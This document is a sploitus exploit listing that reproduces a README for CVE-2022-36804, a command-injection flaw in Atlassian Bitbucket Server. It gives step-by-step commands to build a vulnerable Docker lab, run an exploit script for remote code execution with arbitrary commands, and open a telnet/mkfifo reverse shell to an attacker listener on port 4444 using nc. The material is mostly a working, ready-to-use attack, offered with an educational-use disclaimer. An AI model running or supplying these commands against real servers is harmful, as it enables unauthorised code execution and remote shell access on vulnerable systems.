Exploit for OS Command Injection in Atlassian Bitbucket CVE-2022-36804

Name: Exploit for OS Command Injection in Atlassian Bitbucket CVE-2022-36804
Rating: 5 (171 reviews)
2025-01-30 | CVSS 8.8
## https://sploitus.com/exploit?id=78C1B43D-59D7-531F-984F-0497AFE11838
<h1 style="font-size:10vw" align="left">CVE-2022-36804 - Atlassian Bitbucket Server and Data Center Command Injection Vulnerability</h1>


<img src="https://img.shields.io/badge/CVSS:3.1%20Score%20-8.8 HIGH-red"> [![Python](https://img.shields.io/badge/Python-%E2%89%A5%203.11-blueviolet.svg)](https://www.python.org/) <img src="https://img.shields.io/badge/Maintained%3F-Yes-96c40f">


******
⚠️ *For educational and authorized security research purposes only*


## Original Exploit Authors
Very grateful to the original PoC author [Walnut Security Services Pvt. Ltd](https://github.com/walnutsecurity)


## Description
Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. This vulnerability was reported via our Bug Bounty Program by TheGrandPew.


******
## Step Guides
1. First, clone the repository
    ```bash
    git clone https://github.com/asepsaepdin/CVE-2022-36804.git
    ```
    
2. Change directory
    ```bash
    cd CVE-2022-36804
    ```
    
3. Build vuln container
    ```bash
    docker build -t CVE-2022-36804 .
    ```
    
5. Run ephemeral container
    ```bash
    docker run --rm -it --name CVE-2022-36804 CVE-2022-36804
    ```
    
6. Check container ip address
    ```bash
    docker inspect CVE-2022-36804 | grep "IPAddress"
    ```
    
7. Setup Atlassian bitbucket and create new public repository by open URL: `http://172.17.0.3:7990`

8. Check for Remote Code Execution (RCE)
    ```bash
    python3 cve-2022-36804.py -u http://172.17.0.3:7990
    ```
    
9. Check for RCE with customized command (cmd)
    ```bash
    python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
    ```
    
10. From an attacker perspective, remote code execution is critical to get access to an interactive shell. So, executing the following command would trigger a telnet reverse shell over tcp based on bash to attacker’s system on port 4444/tcp:
    ```bash
    python3 cve-2022-36804.py -u http://172.17.0.3:7990 -c 'TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.1 4444 0<$TF | sh 1>$TF'
    ```
    ```bash
    nc -nlvp 4444
    ```
    
 
******
## Credits
- https://github.com/walnutsecurity/cve-2022-36804
- https://nvd.nist.gov/vuln/detail/cve-2022-36804